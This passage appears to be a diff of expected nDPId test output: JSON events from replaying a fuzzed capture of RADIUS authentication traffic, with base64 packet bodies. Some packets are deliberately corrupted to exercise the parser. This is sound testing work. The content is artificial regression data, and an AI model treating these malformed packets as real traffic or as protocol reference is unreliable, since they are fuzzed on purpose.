VAS3kF7XmN2ldE5ieMRbbfICA=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997654780,"flow_last_seen":1528997654780,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997654780,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997654780,"flow_last_seen":1528997654780,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997654780,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997655006,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1528997655006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997655006,"pkt":"ABRP+4rqcNuYVcUnCABFAADhA5NAAPwRJQAlABk+CgxAHgcUchAAzVdGC1wAxX62GNWdpucNZiYPcJ1Tw+4BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyamE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4T0oBAgBIFwEAAAEF+QC\/pRrW1P2OBIB77PLtyYRYAgUAAKO0Q86taQAA4Eb2Dn1+Ei2LAQACCwUAANEKc5kzaUyUHJ2asC+h4v1QEoNkNdC6vGAIe51fKjW9k5g="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997655006,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997655006,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":165,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528997655347} 01256{"packet_event_id":1,"packet_event_name":"packet","packet_id":165,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997655006,"pkt":"AAAMB6xAABRP+4rqCABFAALHnfCWAP8RAAAKDEAexuIZPnIQBxQCswAAAV0Cq2pJZM0ruVNMnb6INz7DlDAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFd2CQlXSVNQUjEwGgkQADghDQM1NwZbIqcXATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceUTAwLWE3KjQyLWQwLWUwQDAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzUxNmE3MjI1YiwgNWIyMmE3MTYvZjA6Nzk6MjA6ZDE6N2Q6MzcvMjI4JAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAADLaWk9Y3GhxCUALFVq30f3AwIAIPJ2\/3EaFAAAV8gHDlZaV0MyVGVzdEzhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x4bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQXOelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZBbHVlGh0AADghExc0MC44MDQ4ODJOLTc2LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW26aXJlY3QaDAAABYMHBsB8SplQEpV0+y2O0IA5getcDb\/AJ1c="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997655528,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1528997655528,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"thread_ts_msec":1528997655528,"pkt":"ABRP+4rqcNuYZMUnCABFAAEwA5xAAPwRT9bG4hk+CgwlAAcUchB0HNn2Al0BFJBXpcO19tza8j\/VlLjh3P0aCwAAV8gbBVNQQxpuAAABNxA0jONf4TbIHPUvuy933g6GTJqzqlfKJTFZvtaM0NBQo2jkN\/g2tPEp73PKTNfSnSD8j7kRNPVhPusRHPLIHahhhZlLWh2egFea0oaNGerpaQMfhEQ5jMYg8ICzMJVYCSspbKc8\/fk7ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIjViMjJhNzE2L2YwOjc5OjYwOmQxOjclADM3LzIyOFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBIwdD70xCUAoHuVXO\/FXR+q"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997655528,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997655528,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 01393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1528997659285,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997659285,"pkt":"AAAMB6xAABRP+4rqCABFAALbtPFAAP8RAAAKDEAexuIZPnIQBxQCxwAAAV4Cv0qC4LnwI1oT30\/+r6N\/324aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADchDQM1NwZbIqcbMzUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmUxd29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlJQB6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzUxNmE3MjI1YiwgNWIyMmE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4BAasFAEQIA5WWldDMlRXc3RMYWIaDHUAN2MBBgD2AAIGBgAAAAIMBgAABRQ9BgAAABNHBgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0Z2FiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAlAMglBVZ6VxoNAAA4IQ4HMDclADEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASL5LJM0zKVOhBluOjWkW9+A=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997659473,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1528997659473,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997659473,"pkt":"ABRP+4rqcNuYVccnCABFAADhA6lAAPwRUBjG4hk+CgxAHgcUcm8AzZu5C14AxUxI+gXiLIrMuBk\/g\/m1ALsBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4T0oBAgBIFwEAAAEFAACnLVLIF0rTm6KFdNC987pOAgUAAJOGz1Q0xAAAaP51Ml0i0tuLAQACCwUAAGEYnEUncDkjDC3ik4qARkBQEl1GRO63bmbIH3rSxoBwm9k="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997659473,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997659473,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 01365{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1528997659803,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997659803,"pkt":"AAAMB6xAABRP+4rqCABFAALHtPJAAP8RAAAKDEAexuIZPnIQBxQCswAAAV8Cq4u3v\/AI1pCqOyPuExx1k6FwCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM1RQZbIqcbATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jY\/0xMS4zZ3BwbmV0d29yay5vcmdZhhB+CDFjaXNjb4MGJQAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzUxNmE3MjI1YiwgNWIyMmE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABjIAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAACko3IYMyHHAM47ZS3aaJ9qAwIAIPaHgNUaFAAAV8glAFaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997663786,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1528997663786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997663786,"pkt":"AAAMB6xAABRP+4rqCABFAALbIRJAAP8RAAAKDEAexuIZNXJ4BxQCxwAAAWACvwChXhfZ\/4Ullo9FfFDZMhwaSgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQc2NwZbIqcfATUwMzExNDgwMDczNjM4MDcyQHdsYW74bW5CNDgwLm1jJQAxMS4zZ3BwbmV0dW9yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtN0MtNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjqzAwMDAwYzUxNmE3MjI1YiwgNWIiMmE3MTYvJQA6Nzk6NjA6ZDE6N2Q6MzcvMjI4BAasFAEQIA5WWldDMlRlc3RMYWIaDAgAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNnCXBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gJClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBElAHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8hABVZ6VxoNAAA4IQ4HMDcwNzMaDAAAOPYRBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAm0VAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVAS63yjoOn5DGF0SWn3Fz+BWg=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997663786,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997663786,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663992,"flow_last_seen":1528997663992,"flow_idle_time":620000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1528997663992,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1528997663992,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997663992,"pkt":"ABRP+4rqcNuYVcUnCABFAADhA8JAAPuqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":174,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997664564,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":174,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997664564,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":174,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528997664794} 00711{"packet_event_id":1,"packet_event_name":"packet","packet_id":174,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997664564,"pkt":"ABRP+4rqcNuYVcUnCABFAAEwJQBAOfwRT6vG4hk1CgxAHgcUchABHPYEAmEBFD8mC375vqLp+KF9uwm3k4gaCwAAV8gbBVNQQxpuAAABNxA07wUYi7+P\/KZsVS9NJaMwCtVJk9jEkC3Vl7jOtDBnuTtoap5IYaKcg6eQ4RJKJBTY9DYRNNB+ybyX+uSA4d1O4JYyTwpoEtUi2e6DQEAJ+nzQSzAvvoa2HSAJtTQFSW0rq69l6fpVATUwMzExNDgwMDcTwDM4MDcyQHdsYW4ubW5jNDjSLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNzE2L2YwOjc5OjYwOmQxOjdkOjM3LzIyOFkMOTA4JQAhMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJTXIMaNTnLNgc2lqiL9H7Q"} 00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":175,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997683254} 01282{"packet_event_id":1,"packet_event_name":"packet","packet_id":175,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997664564,"pkt":"AAAMB6xAABRP+4rqCABRAALbIRRAAP8RAAAKDEAexuIZNXIQBxQCxwAAAWICv9GcOA+HA3ZCcU+zBYarldEaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXMlNQUjEwGgkAADghDQM4NwZbIqczATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUyLTAwOlZlchR6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJAzdhdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzUxNmE3MjI1YiwgNWIyMlE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNMcHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3Rhqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 